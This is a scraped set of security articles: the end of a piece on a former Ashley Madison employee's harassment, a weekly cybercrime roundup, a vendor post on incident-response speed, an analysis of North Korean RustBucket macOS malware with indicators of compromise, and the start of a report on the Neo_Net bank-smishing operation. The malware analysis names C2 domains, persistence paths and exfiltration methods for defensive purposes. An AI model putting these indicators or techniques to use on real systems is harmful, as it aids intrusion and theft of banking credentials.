Will Harrison was terminated as an Ashley Madison employee in November 2011, and by early 2012 he’d turned his considerable harassment skills squarely against the company. Ashley Madison’s long-suspected army of fake female accounts came to the fore in August 2012 after the former sex worker turned activist and blogger Maggie McNeill published screenshots apparently taken from Ashley Madison’s internal systems suggesting that a large percentage of the female accounts on the service were computer-operated bots.

Ashley Madison’s executives understood that only a handful of employees at the time would have had access to the systems needed to produce the screenshots McNeill published online. In one exchange on Aug. 16, 2012, Ashley Madison’s director of IT was asked to produce a list of all company employees with all-powerful administrator access.

“Who or what is asdfdfsda@asdf.com?,” Biderman asked, after being sent a list of nine email addresses.

“It appears to be the email address Will used for his profiles,” the IT director replied.

“And his access was never shut off until today?,” asked the company’s general counsel Mike Dacks.

A Biderman email from 2012.

What prompted the data scientist Bullock to reach out were gobs of anti-Semitic diatribes from Harrison, who had taken to labeling Biderman and others “greedy Jew bastards.”

“So good luck, I’m sure we’ll talk again soon, but for now, Ive got better things in the oven,” Harrison wrote to Biderman after his employment contract with Ashley Madison was terminated. “Just remember I outsmarted you last time and I will outsmart and out maneuver you this time too, by keeping myself far far away from the action and just enjoying the sideline view, cheering for the opposition.”

A 2012 email from William Harrison to former Ashley Madison CEO Noel Biderman.

Harrison signed his threatening missive with the salutation, “We are legion,” suggesting that whatever comeuppance he had in store for Ashley Madison would come from a variety of directions and anonymous hackers.

The leaked Biderman emails show that Harrison made good on his threats, and that in the months that followed Harrison began targeting Biderman and other Ashley Madison executives with menacing anonymous emails and spoofed phone calls laced with profanity and anti-Semitic language.

But on Mar. 5, 2014, Harrison committed suicide by shooting himself in the head with a handgun. This fact was apparently unknown to Biderman and other Ashley Madison executives more than a year later when their July 2015 hack was first revealed.

Does Harrison’s untimely suicide rule him out as a suspect in the 2015 hack? Who is The Chaos Creator, and what else transpired between Harrison and Ashley Madison prior to his death? We’ll explore these questions in Part II of this story, to be published early next week.

The Good, the Bad and the Ugly in Cybersecurity – Week 27

/0 Comments/in /by

The Good | Authorities Arrest Alleged Ringleader of Major Cybercrime Organization

After pocketing as much as $30 million in stolen funds over the course of four years, a suspected senior member of the OPERA1ER cybercrime organization has been arrested in Cote d’Ivoire. The arrest was carried out as part of Interpol’s Operation Nervone with cooperation across local and international law enforcement agencies as well as cybersecurity researchers.

OPERA1ER, aka BlueBottle, NX$M$, DESKTOP Group, or Common Raven, is infamous for over 30 attacks spanning 15 countries in Africa, Asia, and Latin America. According to Interpol, they are a highly mature criminal organization focused on targeting financial institutions and mobile banking services with mass business email compromise (BEC) and malware campaigns.

Source: Group-IB

Based on recent security findings, BEC scams continue to soar. These scams are a sophisticated form of cyber fraud where attackers impersonate legitimate business email accounts to deceive recipients and either initiate fraudulent transactions or gain unauthorized access to sensitive information. Last year alone, IC3 received over 20,000 BEC-related complaints with adjusted losses amounting to over $2.7 billion.

OPERA1ER gains an initial level of compromise through well-crafted spear phishing emails embedded with remote access trojans (RATs), keyloggers, and password stealers. Noted in previous attacks, OPERA1ER emails are in French and often reuse tax office and job hiring language. After breaking in, the group is known to use tools like Cobalt Strike and Metasploit to establish persistence.

The success of Operation Nervone is the result of extensive collaboration between various law enforcement and cybersecurity researchers Orange-CERT-CC and Group-IB, who first published a report on OPERA1ER late last year. The operation represents the importance of exchanging threat intelligence and working collectively to bring down high-profile, organized cybercrime syndicates.

The Bad | High-Severity Vulnerability In Cisco Switches Allows Attackers to Modify Encrypted Traffic

Cisco has issued a security advisory this week warning customers about a new, high severity vulnerability allowing attackers to tamper with encrypted traffic in some data center switches.

Identified as CVE-2023-20185, the vulnerability was found during internal security testing and impacts Cisco Nexus 9332C, 9354C, and 9500 spine switches equipped with a Cisco Nexus N9K-X9736C-FX Line Card, operating in application centric infrastructure (ACI) mode, running firmware 14.0 or later, and that have the CloudSec encryption feature enabled. ACI mode is most typically used in data centers for controlling both physical and virtual networks.

Source: Cisco Security

The vulnerability stems from an issue in the implementation of ciphers leveraged by the CloudSec encryption feature on affected switches. Exploitation of CVE-2023-20185 occurs when an attacker intercepts the traffic and uses cryptanalytic techniques to bypass encryption between two ACI sites.

If exploited, attackers can gain unauthenticated access and either read or tamper with intersite encrypted traffic between the remote sites. Further, successful exploitation enables adversaries to access data that allows them to move laterally across the compromised network.

So far, Cisco’s Product Security Incident Response Team (PSIRT) says it has no indications of active exploitation or public proof of concepts (PoCs) targeting the vulnerability. However, there are no software upgrades to address the vulnerability. This is a developing situation and customers can minimize the risks of unauthorized access and data manipulation by disabling the ACI multi-site CloudSec encryption feature immediately and contacting Cisco support to discuss alternative options.

The Ugly | BlackCat Ransomware Runs Malvertising Campaigns By Cloning Popular File Transfer App

This week, cybersecurity researchers uncovered several malvertising campaigns designed to spread malware-laden installers to unsuspecting WinSCP users. WinSCP is an open-source and free SFTP, FTP, WebDAV, S3 and SCP client, and file manager for Windows that boasts over 201 million downloads and counting. The campaign has since been attributed to the notorious BlackCat ransomware group (aka ALPHV).

Malvertising (malicious advertising) is delivered through legitimate online advertising networks and platforms. These advertisements appear as regular ads on websites, but contain malicious links and code that infects users’ devices with malware. Upon interaction, users are redirected to attacker-controlled websites or prompted to download the malware. Malvertising takes advantage of the trust placed in reputable brands and advertising networks, making it difficult for users to identify the threat.

In the recent BlackCat campaigns, the group used WinSCP specifically to lure IT professionals, web and systems administrators to obtain initial access to valuable target networks. Researchers had discovered ads promoting fake WinSCP sites on both Google and Bing search pages. The spoofed WinSCP sites prompted visitors to download the app, masking behind domain names that are very similar to the real WinSCP website. Further interaction then installed a trojanized DLL file containing a Cobalt Strike beacon that connected to a C2 server.

Source: Trend Micro

Attacks due to malvertising continue to increase, and have recently been seen spreading a new macOS variant of Atomic Stealer, stealing AWS logins, and distributint virtualized .NET malware loaders. Businesses can prevent attacks from malvertising by using firewall control and web filters to block access to known malicious websites, implementing ad blocking software to prevent ads from being displayed, and deploying endpoint protection software to prevent and detect the execution of malicious code delivered through malicious adverts.

Cybersecurity In The Fast Lane | Why Speed Is Key In Incident Response & Mitigation

/0 Comments/in /by

Threat actors are constantly evolving, consistently developing the tools, tactics, and procedures (TTPs) they use in attacks. In today’s threat landscape, enterprises of all sizes and industries find themselves pitted against professional cybercriminal gangs, advanced persistent threat (APT) groups, and even nation-state actors – all of whom are leveraging faster attack methods than ever before.

In addition to sophisticated TTPs and how organized many cybercrime-as-a-service models have become, enterprises also face the reality of how quickly active threats can become full-blown incidents. Speed, in both cybersecurity and cyberattacks, is the key metric to pay attention to as it defines the success of either the attacker or the defender.

This blog discusses the metric of speed in context of modern threat actors, their methods, and how enterprise security teams can shave off critical seconds and minutes in their own detection and response processes.

Threat Actors Are Picking Up Their Speed

Technology has changed dramatically in the last few years alone, becoming smarter, faster, and more advanced. While enterprises use the latest software and tools to further their businesses, threat actors have done the same to level up their attack methods.

Ransomware Attacks

Consider one of the most significant takeaways from Mandiant’s latest M-Trends report: The global median dwell time – the time marking the beginning of an intrusion and the moment it is identified – is dropping year over year. At a mere 16 days of average dwell time for 2022, this may seem like a positive development as threat actors are spending less time inside a system post-entry. However, skyrocketing counts of ransomware attacks on global businesses give a good indication as to why average dwell times are on the decline.

Though some of the reduction in dwell time is attributed to improved detection and response capabilities, ransomware has become a digital pandemic, targeting victims in all industry verticals. Given its high earning potential for a relatively short attack time frame, ransomware attacks are highly lucrative for threat actors and are protected by security experts to continue rising in both frequency and severity.

Drive-By Download Attacks

As their name suggests, drive-by downloads are stealthy, fast, and often happen before the victim even knows what’s happening. This type of cyberattack is employed by cybercriminals to infect a victim’s device with malware without their knowledge or consent. It typically occurs when they visit a compromised website or click on a malicious link embedded in an email or advertisement.

The attack then takes advantage of vulnerabilities in web browsers, plugins, or operating systems, allowing the malware to be automatically downloaded and executed on the victim’s device. Drive-by downloads require only the bare minimum of a victim’s interaction, making them a potent tool for spreading malware, stealing sensitive information, and gaining unauthorized access to systems.

Mass Scanning For Vulnerabilities

Based on new research, security defenders have a real race against the clock to patch new vulnerabilities. Researchers have found that threat actors start to perform mass, internet-wide scans for vulnerable endpoints within just 15 minutes after a new CVE is disclosed. Threat actors consistently monitor vendor bulletins and software update channels for the latest announcements on vulnerabilities and proof of concepts that they can leverage in their next attack. Oftentimes, these fresh vulnerabilities provide them with the capability to perform remote code execution (RCE) and gain access to corporate networks.

Patch management is a continuous and, for many organizations, arduous task that requires security teams to try to keep up with all the latest security threats and issues in various operating systems. Since performing these internet-wide scans do not require a deep skill set, even low-level criminals are able to take advantage, sometimes even selling their scan results to more experienced actors.

Zero-Day Exploits

Threat actors are gaining momentum on how quickly they can exploit zero-days. In a recent Vulnerability Intelligence Report, researchers cited time-to-exploit as being the critical metric for security practitioners. Over the past three years, the time measured between disclosure and known exploitation has decreased steadily, going from 30% of vulnerabilities exploited in the wild within one week in 2020 to 56% found exploited within one week in 2022. Zero-days are most often exploited to provide initial access for ransomware gangs.

Growing Availability of Off-The-Shelf-Tools

Apart from APT groups, full-fledged ransomware gangs, and nation-backed threat actors, low-level cybercriminals are taking their shot on enterprises due to the widening availability of ready-to-use hacking tools. These tools, including exploit kits, infostealers, scanners, password crackers, and attack simulation tools, are commonly available on forums and darknet markets and significantly lower the barrier to launching serious cyberattacks.

As the market for selling pre-made tools continues to expand, cybercriminals with little to no technical expertise are now able to quickly find and purchase pre-existing scripts to launch attacks on computer systems and networks.

Deciphering How Actors Move Across The Cyber Attack Lifecycle

Though cyber threat actors are moving swiftly, there are ways for enterprise businesses to stay ahead and safeguard their critical data and systems. Understanding how actors maneuver before and during their attacks allows defenders to put in the right safeguards in place.

  • Planning Phase – Before the act of attack, threat actors will select their target and work to identify exploitable aspects of their operations. This refers to any low hanging fruits such as unpatched vulnerabilities, misconfigurations, administrative users on unprotected devices, and more.
  • Initial Intrusion – Based on the findings from the planning phase, threat actors tailor their intrusion technique based on the weaknesses of their victims.
  • Enumeration Phase – Once inside, threat actors move fast to situate themselves within the system, understand the limits of their current permissions, and establish an estimate on what privileges they require to start moving laterally. Time is of the essence in this phase as actors start to establish their foothold and upgrade their access.
  • Lateral Movement – Using their new credentials, the actors are able to spread deep into the affected system. Here, their main goal is to distribute their malware/toolset, exfiltrating and encrypting data as they go.
  • Objective Completion – After deleting or corrupting backups and local files, actors prepare to ransom their victim.

Based on the cyberattack lifecycle, the intrusion and enumeration phases open up a critical window for proactive action by cyber defenders. During these initial stages, the attackers have not yet deeply infiltrated the compromised network or blended in with normal network traffic. If a threat actor manages to make it to the lateral movement phase, detection becomes much more challenging. Threat actors use evasion tactics to avoid detection, embedding themselves deeply within the network. Living-off-the-land techniques are most often used in this phase, leveraging legitimate processes and tools already present in the environment to strengthen their foothold.

Since the time span between intrusion and lateral movement is rapidly shrinking as threat actors become more sophisticated and well-equipped, the primary goal for cyber defenders is to focus on detecting the first signs of compromise during the enumeration phase and isolating the threat before it can cause significant damage.

Autonomous Tools Take the Toil Out of Triage

Managing such a challenge, however, is often beyond the resources of a security team tasked with manual triage of a flood of alerts and uncontextualized event data. That’s why autonomous, AI-powered EDR and XDR solutions are the new go-to tools for analysts, threat hunters and incident responders alike.

A modern security tool like SentinelOne Singularity not only autonomously deals with known malware threats – from detection right through to mitigation and even rollback in the case of a ransomware attack that gets through – but also provides incident responders with contextualized data to tackle targeted attacks.

With automated contextual enrichment from tools such as Singularity XDR, IR teams can take advantage of insights from aggregated event information that combines all related data gathered from multiple tools and services into a single ‘incident’, without adding extra tools or more people. Out-of-the-box integrations and pre-tuned detection mechanisms across the security stack help improve productivity, threat detection, and forensics.

SentinelOne Vigilance Respond | Our Approach to Managed Detection & Response (MDR)

While powerful, such tools can be supplemented by Managed Detection and Response services for an even higher level of security. Organizations across the globe rely on SentinelOne’s Managed Detection and Response (MDR) service, Vigilance Respond, to stop threat actors from reaching the lateral movement stage in attacks. Utilizing SentinelOne Singularity, Vigilance Respond defends networks against cyberattacks instantly and monitors customer environments 24/7/365, hunting for advanced threats and providing faster mean-time-to-response (MTTR) rates.

Vigilance Respond works by providing machine-speed detection technology run by dedicated analysts working around-the-clock. It also allows organizations to adapt instantly, and at scale, in today’s ever-shifting threat landscape, closing the gap between intrusion and lateral movement and neutralizing the threat actor before they can begin to spread deep into a target’s systems.

Vigilance Respond offers these services to ensure businesses are safeguarded:

  • Active threat campaign hunting for APTs
  • Alerting and remediation guidance for emerging threats
  • Incident-based triage and hunting
  • 24/7/365 monitoring, triage, and response
  • Security Assessment (Vigilance Respond Pro)
  • Digital Forensics Investigation & Malware Analysis (Vigilance Respond Pro)

Conclusion

In the realm of cybersecurity, speed matters. It can be the deciding factor between successfully thwarting an attack or suffering substantial damage. As technology evolves and threat actors become more adept at exploiting vulnerabilities, enterprise leaders are investing in strategies focused on swift and proactive cybersecurity response measures.

Ultimately, speed in cybersecurity is about staying one step ahead of the adversaries. It requires a proactive approach, continuous monitoring, and real-time threat intelligence. By prioritizing speed, organizations can enhance their ability to detect, respond to, and mitigate cyber threats, ensuring a stronger and more resilient security posture.

Learn more about how SentinelOne Singularity and Vigilance Respond can help safeguard your business by contacting us or requesting a demo.

Vigilance Respond
Rely on machine-speed technology run by dedicated analysts to adapt to today’s threat landscape.

Request a Demo

BlueNoroff | How DPRK’s macOS RustBucket Seeks to Evade Analysis and Detection

/0 Comments/in /by

Back in April, researchers at JAMF detailed a sophisticated APT campaign targeting macOS users with multi-stage malware that culminated in a Rust backdoor capable of downloading and executing further malware on infected devices. ‘RustBucket’, as they labeled it, was attributed with strong confidence to the BlueNoroff APT, generally assumed to be a subsidiary of the wider DPRK cyber attack group known as Lazarus.

In May, ESET tweeted details of a second RustBucket variant targeting macOS users, followed in June by Elastic’s discovery of a third variant that included previously unseen persistence capabilities.

RustBucket is noteworthy for the range and type of anti-evasion and anti-analysis measures seen in various stages of the malware. In this post, we review the multiple malware payloads used in the campaign and highlight the novel techniques RustBucket deploys to evade analysis and detection.

RustBucket Stage 1 | AppleScript Dropper

The attack begins with an Applet that masquerades as a PDF Viewer app. An Applet is simply a compiled AppleScript that is saved in a .app format. Unlike regular macOS applications, Applets typically lack a user interface and function merely as a convenient way for developers to distribute AppleScripts to users.

The threat actors chose not to save the script as run-only, which allows us to easily decompile the script with the built-on osadecompile tool (this is, effectively, what Apple’s GUI Script Editor runs in the background when viewing compiled scripts).

Stage 1 executes three ‘do shell script’ commands to set up Stage 2
Stage 1 executes three ‘do shell script’ commands to set up Stage 2

The script contains three do shell script commands, which serve to download and execute the next stage. In the variant described by JAMF, this was a barebones PDF viewer called  Internal PDF Viewer. We will forgo the details here as researchers have previously described this in detail.

Stage 1 writes the second stage to the /Users/Shared/ folder, which does not require permissions and is accessible to malware without having to circumvent TCC. The Stage 1 variant described by Elastic differs in that it writes the second stage as a hidden file to /Users/Shared/.pd.

The Stage 1 is easily the least sophisticated and easily detected part of the attack chain. The arguments of the do shell script commands should appear in the Mac’s unified logs and as output from command line tools such as the ps utility.

Success of the Stage 1 relies heavily on how well the threat actor employs social engineering tactics. In the case described by JAMF, the threat actors used an elaborate ruse of requiring an “internal” PDF reader to read a supposedly confidential or ‘protected’ document. Victims were required to execute the Stage 1 believing it to be capable of reading the PDF they had received. In fact, the Stage 1 was only a dropper, designed to protect the Stage 2 should anyone without the malicious PDF stumble on it.

RustBucket Stage 2 | Payloads Written in Swift and Objective-C

We have found a number of different Stage 2 payloads, some written in Swift, some in Objective-C, and both compiled for Intel and Apple silicon architectures (see IoCs at the end of the post). The sizes and code artifacts of the Stage 2 samples vary. The universal ‘fat’ binaries vary between 160Kb and 210Kb.

Samples of RustBucket Stage 2 vary in size
Samples of RustBucket Stage 2 vary in size

Across the samples, various username strings can be found. Those we have observed in Stage 2 binaries so far include:

/Users/carey/
/Users/eric/
/Users/henrypatel/
/Users/hero/

Despite the differences in size and code artifacts, the Stage 2 payloads have in common the task of retrieving the Stage 3 from the command and control server. The Stage 2 payload requires a specially-crafted PDF to unlock the code which would lead to the downloading of the Stage 3 and provide an XOR’d key to decode the obfuscated C2 appended to the end of the PDF.

In some variants, this data is executed in the downAndExecute function as described by previous researchers; in others, we note that download of the next stage is performed in the aptly-named down_update_run function. This function itself varies across samples. In b02922869e86ad06ff6380e8ec0be8db38f5002b, for example, it runs a hardcoded command via system().

Stage 2 executes a shell command via the system() call to retrieve and run Stage 3
Stage 2 executes a shell command via the system() call to retrieve and run Stage 3

However, the same function in other samples, (e.g., d5971e8a3e8577dbb6f5a9aad248c842a33e7a26) use NSURL APIs and entirely different logic.

Code varies widely among samples, possibly suggesting different developers
Code varies widely among samples, possibly suggesting different developers

Researchers at Elastic noted, further, that in one newer variant of Stage 2 written in Swift, the User-Agent string is all lowercase, whereas in the earlier Objective-C samples they are not.

User-Agent string is subtly changed from the Objective-C to Swift versions of Stage 2
User-Agent string is subtly changed from the Objective-C to Swift versions of Stage 2

Although user agent strings are not inherently case sensitive, if this was a deliberate change it is possible the threat actors are parsing the user agent strings on the server side to weed out unwanted calls to the C2.

In the most recent samples, the payload retrieved by Stage 2 is written to disk as“ErrorCheck.zip” in _CS_DARWIN_USER_TEMP (aka $TMPDIR typically at /var/folders/…/../T/) before being executed on the victim’s device.

RustBucket Stage 3 | New Variant Drops Persistence LaunchAgent

The Stage 3 payload has so far been seen in two distinct variants:

  • A: 182760cbe11fa0316abfb8b7b00b63f83159f5aa Stage3
  • B: b74702c9b82f23ebf76805f1853bc72236bee57c ErrorCheck, System Update

Both variants are Mach-O universal binaries compiled from Rust source code. Variant A is considerably larger than B, with the universal binary of the former weighing in at 11.84MB versus 8.12MB for variant B. The slimmed-down newer variant imports far fewer crates and makes less use of the sysinfo crate found in both. Notably, variant B does away with the webT class seen in variant A for gathering environmental information and checking for execution in a virtual machine via querying the SPHardwareDataType value of system_profiler.

The webT class appears in variant A of the Stage 3 payload
The webT class appears in variant A of the Stage 3 payload

However, variant B has not scrubbed all webT artifacts from the code and reference to the missing module can still be found in the strings.

18070 0x0032bdf4 0x10032bdf4 136  137                            
ascii   /Users/carey/Dev/MAC_DATA/MAC/Trojan/webT/target/x86_64-apple-darwin/release/deps/updator-7a0e7515c124fac6.updator.ab9d0eaa-cgu.0.rcgu.o
<img loading="lazy" class="size-full wp-image-82282" src="https://www.sentinelone.com/wp-content/uploads/2023/07/RustBucket_3.jpg" alt="A string referencing the missing webT module can still be found in Stage 3 variant B” width=”734″ height=”402″ />
A string referencing the missing webT module can still be found in Stage 3 variant B

The substring “Trojan”, which does not appear in earlier variants, is also found in the file path referenced by the same string.

Importantly, variant B contains a persistence mechanism that was not present in the earlier versions of RustBucket. This takes the form of a hardcoded LaunchAgent, which is written to disk at ~/Library/LaunchAgents/com.apple.systemupdate.plist. The ErrorCheck file also writes a copy of itself to ~/Library/Metadata/System Update and serves as the target executable of the LaunchAgent.

Since the Stage 3 requires a URL as a launch parameter this is provided in the property list as a Program Argument. Curiously, the URL passed to ErrorCheck on launch is appended to this hardcoded URL in the LaunchAgent plist.

RustBucket LaunchAgent concatenates the hardcoded URL with the one supplied at launch
RustBucket LaunchAgent concatenates the hardcoded URL with the one supplied at launch

Appending the supplied value to the hardcoded URL can be clearly seen in the code, though whether this is an error or accounted for in the way the string is parsed by the binary we have yet to determine.

Much of the malware functionality found in variant A’s webT methods is, in variant B, now buried in the massive sym.updator::main function. This is responsible for surveilling the environment and parsing the arguments received at launch, processing commands, gathering disk information and more. This massive function is over 22Kb and contains 501 basic blocks. Our analysis of this is ongoing but aside from the functions previously described by Elastic, this function also gathers disk information, including whether the host device’s disk is SSD or the older, rotational platter type.

Among updator::main’s many tasks is gathering disk information
Among updator::main’s many tasks is gathering disk information

After gathering environmental information, the malware calls sym.updator::send_request to post the data to the C2 using the following User Agent string (this time not in lowercase):

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)

The malware compares the response against two hardcoded values, 0x31 and 0x30.

Checking the values of the response from the C2
Checking the values of the response from the C2

In the sample analyzed by Elastic, the researchers reported that 0x31 causes the malware to self-terminate while 0x30 allows the operator to drop a further payload in the _CS_DARWIN_USER_TEMP directory.

The choice of Rust and the complexity of the Stage 3 binaries suggest the threat actor was willing to invest considerable effort to thwart analysis of the payload. As the known C2s were unresponsive by the time we conducted our analysis, we were unable to obtain a sample of the next stage of the malware, but already at this point in the operation the malware has gathered a great deal of host information, enabled persistence and opened up a backdoor for further malicious activity.

SentinelOne Protects Against RustBucket Malware

SentinelOne Singularity protects customers from known components of the RustBucket malware. Attempts to install persistence mechanisms on macOS devices are also dynamically detected and blocked by the agent.

SentinelOne Agent User Interface Detects RustBucket malware
SentinelOne Agent User Interface
SentinelOne Singularity Console Detects RustBucket malware
SentinelOne Singularity Console

Conclusion

The RustBucket campaign highlights that the threat actor, whom previous researchers have confidently attributed to DPRK’s BlueNoroff APT, has invested considerable resources in multi-stage malware aimed specifically at macOS users and is evolving its attempts to thwart analysis by security researchers.

The extensive effort made to evade analysis and detection in itself shows the threat actor is aware of the growing adoption of security software by organizations with macOS devices in their fleets, as security teams have increasingly begun to see the need for better protection than provided out-of-the-box. SentinelOne continues to track the RustBucket campaign and our analysis of the known payloads is ongoing.

To see how SentinelOne can help safeguard your organization’s macOS devices, contact us for more information or request a free demo.

Indicators of Compromise

Stage 2 Mach-Os

SHA1 Arch Lang
0df7e1d3b3d54336d986574441778c827ff84bf2 FAT objc
27b101707b958139c32388eb4fd79fcd133ed880 ARM objc
338af1d91b846f2238d5a518f951050f90693488 ARM objc
5304031dc990790a26184b05b3019b2c5fa7022a FAT swift
72167ec09d62cdfb04698c3f96a6131dceb24a9c ARM objc
7f9694b46227a8ebc67745e533bc0c5f38fdfa59 ARM objc
963a86aab1e450b03d51628797572fe9da8410a2 FAT objc
9676f0758c8e8d0e0d203c75b922bcd0aeaa0873 FAT objc
a7f5bf893efa3f6b489efe24195c05ff87585fe3 ARM swift
ac08406818bbf4fe24ea04bfd72f747c89174bdb x86 objc
acf1b5b47789badb519ff60dc93afa9e43bbb376 x86 swift
b02922869e86ad06ff6380e8ec0be8db38f5002b x86 objc
d5971e8a3e8577dbb6f5a9aad248c842a33e7a26 x86 objc
e0e42ac374443500c236721341612865cd3d1eec FAT objc
ed4f16b36bc47a701814b63e30d8ea7a226ca906 FAT swift
fd1cef5abe3e0c275671916a1f3a566f13489416 x86 objc

Stage 3 Version A Mach-Os

SHA1 Arch Lang
182760cbe11fa0316abfb8b7b00b63f83159f5aa FAT rust
3cc19cef767dee93588525c74fe9c1f1bf6f8007 ARM rust
831dc7bc4a234907d94a889bcb60b7bedf1a1e13 x86 rust
8e7b4a0d9a73ec891edf5b2839602ccab4af5bdf x86 rust

Stage 3 Version B Mach-Os

SHA1 Arch Lang
69f24956fb75beb9b93ef974d873914500e35601 ARM rust
8a1b32ab8c2a889985e530425ae00f4428c575cc FAT rust
b74702c9b82f23ebf76805f1853bc72236bee57c FAT rust
cd8f41b91e8f1d8625e076f0a161e46e32c62bbf x86 rust

Malicious PDFs

SHA1 Name
469236d0054a270e117a2621f70f2a494e7fb823 DOJ Report on Bizlato Investigation.pdf
574bbb76ef147b95dfdf11069aaaa90df968e542 Readme.pdf
7e69cb4f9c37fad13de85e91b5a05a816d14f490 InvestmentStrategy(Protected).pdf
7f8f43326f1ce505a8cd9f469a2ded81fa5c81be Jump Crypto Investment Agreement.pdf
be234cb6819039d6a1d3b1a205b9f74b6935bbcc DOJ Report on Bizlato Investigation_asistant.pdf
e7158bb75adf27262ec3b0f2ca73c802a6222379 Daiwa Ventures.pdf

Stage 1 Applications (.zip)

0738687206a88ecbee176e05e0518effa4ca4166
0be69bb9836b2a266bfd9a8b93bb412b6e4ce1be
5933f1a20117d48985b60b10b5e42416ac00e018
7a5d57c7e2b0c8ab7d60f7a7c7f4649f33fea8aa
7e1870a5b24c78a5e357568969aae3a5e7ab857d
89301dfdc5361f1650796fecdac30b7d86c65122
9121509d674091ce1f5f30e9a372b5dcf9bcd257
9a5f6a641cc170435f52c6a759709a62ad5757c7
a1a85cba1bc4ac9f6eafc548b1454f57b4dff7e0
ca59874172660e6180af2815c3a42c85169aa0b2
d9f1392fb7ed010a0ecc4f819782c179efde9687
e2bcdfbda85c55a4d6070c18723ba4adb7631807

AppleScript main.scpt
dabb4372050264f389b8adcf239366860662ac52

Communications
cloud[.]dnx.capital
crypto.hondchain[.]com.

File Paths

$TMPDIR/ErrorCheck.zip
/Users/Shared/1.zip
/Users/Shared/Internal PDF Viewer.app
/Users/Shared/.pd
~/Library/Metadata/System Update
~/Library/LaunchAgents/com.apple.systemupdate.plist

Neo_Net | The Kingpin of Spanish eCrime

/0 Comments/in /by

In partnership with vx-underground, SentinelOne recently ran its first Malware Research Challenge, in which we asked researchers across the cybersecurity community to submit previously unpublished work to showcase their talents and bring their insights to a wider audience.

Today’s post marks the start of a series highlighting the best entries, beginning with the winner from Pol Thill.

This in-depth and meticulous research into a cybercrime threat actor targeting thousands of clients of financial institutions makes a significant contribution to our understanding of the cybersecurity landscape and is the worthy winner of our challenge.

Executive Summary

  • Neo_Net has been conducting an eCrime campaign targeting clients of prominent banks globally, with a focus on Spanish and Chilean banks, from June 2021 to April 2023.
  • Despite using relatively unsophisticated tools, Neo_Net has achieved a high success rate by tailoring their infrastructure to specific targets, resulting in the theft of over 350,000 EUR from victims’ bank accounts and compromising Personally Identifiable Information (PII) of thousands of victims.
  • The campaign employs a multi-stage attack strategy, starting with targeted SMS phishing messages distributed across Spain and other countries, using Sender IDs (SIDs) to create an illusion of authenticity and mimicking reputable financial institutions to deceive victims.
  • Neo_Net has established and rented out a wide-ranging infrastructure, including phishing panels and Android trojans, to multiple affiliates, sold compromised victim data to third parties, and launched a successful Smishing-as-a-Service offering targeting various countries worldwide.

Introduction

An extensive eCrime campaign has been observed targeting clients of prominent banks around the world from June 2021 to April 2023. Notably, the threat actors have predominantly focused on Spanish and Chilean banks, with 30 out of 50 targeted financial institutions headquartered in Spain or Chile, including major banks such as Santander, BBVA and CaixaBank. Banks targeted in other regions include Deutsche Bank, Crédit Agricole and ING. A complete list can be found in Appendix A at the end of this post.

Despite employing relatively unsophisticated tools, the threat actors have achieved a high success rate by tailoring their infrastructure to their specific targets. The campaign has resulted in the theft of over 350,000 EUR from victims’ bank accounts, along with the compromise of a significant amount of Personally Identifiable Information (PII), including telephone numbers, national identity numbers, and names from thousands of victims.

The mastermind behind this operation, known as Neo_Net, has established and rented out a wide-ranging infrastructure, including phishing panels, Smishing software, and Android trojans to multiple affiliates, sold compromised victim data to interested third parties, and has even launched a successful Smishing-as-a-Service offering that targets various countries worldwide. This report will provide a detailed overview of the campaign and delve into the background of Neo_Net, shedding light on his operations over the years.

Fig 1: Countries targeted by Neo_Net
Fig 1: Countries targeted by Neo_Net

eCrime Campaign against Financial Institutions

The campaign employed a sophisticated multi-stage attack strategy that commenced with targeted SMS phishing messages distributed across Spain using Neo_Net’s proprietary service, Ankarex. These messages leveraged Sender IDs (SIDs) to create an illusion of authenticity, mimicking reputable financial institutions in an attempt to deceive the victims.

Fig 2: Demonstration of Ankarex’s SID functionality in the Ankarex News Channel
Fig 2: Demonstration of Ankarex’s SID functionality in the Ankarex News Channel

The SMS messages employed various scare tactics, such as claiming that the victim’s account had been accessed by an unauthorized device or that their card had been temporarily limited due to security concerns. The messages also contained a hyperlink to the threat actor’s phishing page.

The phishing pages were meticulously set up using Neo_Net’s panels, PRIV8, and implemented multiple defense measures, including blocking requests from non-mobile user agents and concealing the pages from bots and network scanners. These pages were designed to closely resemble genuine banking applications, complete with animations to create a convincing façade:

Fig 3: BBVA and Santander phishing pages
Fig 3: BBVA and Santander phishing pages

Upon submission of their credentials, the victims’ information was surreptitiously exfiltrated to a designated Telegram chat via the Telegram Bot API, granting the threat actors unrestricted access to the stolen data, including the victims’ IP addresses and user agents.

Neo_Net’s affiliates discussing captured credentials and the corresponding bank account
Fig 4: Neo_Net’s affiliates discussing captured credentials and the corresponding bank account

Subsequently, the threat actors employed various techniques to circumvent the Multi-Factor Authentication (MFA) mechanisms commonly employed by banking applications. One such approach involved coaxing victims into installing a purported security application for their bank account on their Android devices.

Fig 5: Android application impersonating ING
Fig 5: Android application impersonating ING

However, this application served no legitimate security purpose and merely requested permissions to send and view SMS messages.

Fig 6: BBVA application showing the SMS permission request after victim clicks on “Actualizar” button
Fig 6: BBVA application showing the SMS permission request after victim clicks on “Actualizar” button

In reality, these Android trojans functioned as modified versions of the publicly available Android SMS spyware known as SMS Eye. Some threat actors further obfuscated the trojan using public packers to evade detection by anti-malware solutions. These Android trojans covertly exfiltrated incoming SMS messages to a distinct dedicated Telegram chat.

Fig 7: Telegram messages showing exfiltrated BBVA OTPs
Fig 7: Telegram messages showing exfiltrated BBVA OTPs

The exfiltrated messages could then be utilized to bypass MFA on the targeted accounts by capturing One-Time Passwords (OTPs). Additionally, the threat actors were also observed employing direct phone calls to victims, possibly to impersonate bank representatives and deceive victims into installing the Android spyware or divulging OTPs.

The threat actors employed this method to target clients of several prominent banks around the world.

The funds illicitly acquired from victims during the course of the year-long operation amounted to a minimum of 350,000 EUR. However, it is probable that the actual sum is significantly higher, as older operations and transactions that do not involve SMS confirmation messages may not be fully accounted for due to limited visibility.

Neo_Net

Neo_Net, the prominent actor responsible for the global cybercrime campaign, has been active in the cybersecurity landscape at least since early 2021. He maintains a public GitHub profile under the name “notsafety” and a Telegram account that showcases his work and identifies him as the founder of Ankarex, a Smishing-as-a-Service platform.

Fig 8: Neo_Net’s Telegram profile
Fig 8: Neo_Net’s Telegram profile

